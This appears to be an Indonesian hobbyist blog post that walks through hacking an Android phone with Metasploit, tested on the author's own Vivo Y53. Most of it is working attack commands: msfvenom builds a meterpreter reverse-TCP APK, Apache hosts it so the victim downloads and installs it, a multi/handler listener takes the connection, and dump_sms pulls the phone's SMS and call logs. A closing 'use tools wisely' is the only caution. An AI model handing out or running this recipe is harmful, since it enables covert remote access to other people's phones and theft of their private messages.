Assalamualaikum Wr. Wb
Hehehe sekali-kali lah posting yang ginian,
Okrek bro jadi kali ini kita akan belajar exploit smartphone. Pada postingan ini,saya menggunakan Hp Vivo Y53 milik saya sebagai targetnya . kali ini saya menggunakan OS Parrot V4.4
Yokk langsung aja,
Sebelumya,aktifkan dulu postgresql dengan perintah
service postgresql start
Buat payload terlebih dahulu menggunakan perintah
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.3 LPORT=4444 -o /var/www/html/a.apk
Keterangan :
10.10.10.3 = IP Interface Wireless saya
4444 = Port yang saya gunakan. Bisa diatur sesuai selera
a.apk = Output dari payload yang berupa file .apk yang berada di /var/www/html untuk disebarkan melalui web server
Setelah itu aktifkan apache2 dengan perintah
service apache2 start
. Dari Hp target. Download file dengan membuka IP address laptop/a.apk
Misal 10.10.10.3/a.apk maka file tersebut akan terdownload ke Hp. Install seperti biasa
Aktifkan Metasploit Framework Console dengan perintah
msfconsole
Setting Console :
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 10.10.10.3 (IP Interface Wireless saya)
set lport 4444 (port yang sudah saya tentukan sebelumnya)
Ketikkan perintah exploit kemudian tekan enter sambil membuka aplikasi yang sudah di install di HP target. Maka akan membuka koneksi ke HP tersebut
Ketikkan help untuk melihat opsi apa saja yang bisa dilakukan
dump_sms untuk mengambil list pesan pada HP dari siapa saja pesan tersebut dikirim/diterima . Nanti ke save di direktori /home
Ini hasil dari dumping SMS dan Panggilan
Mantap broo.. Semoga bisa jadi hiburan di sela waktu luang,ingat gunakan tools dengan bijak ya
Sekian dari saya
Wassalamualaikum Wr. Wb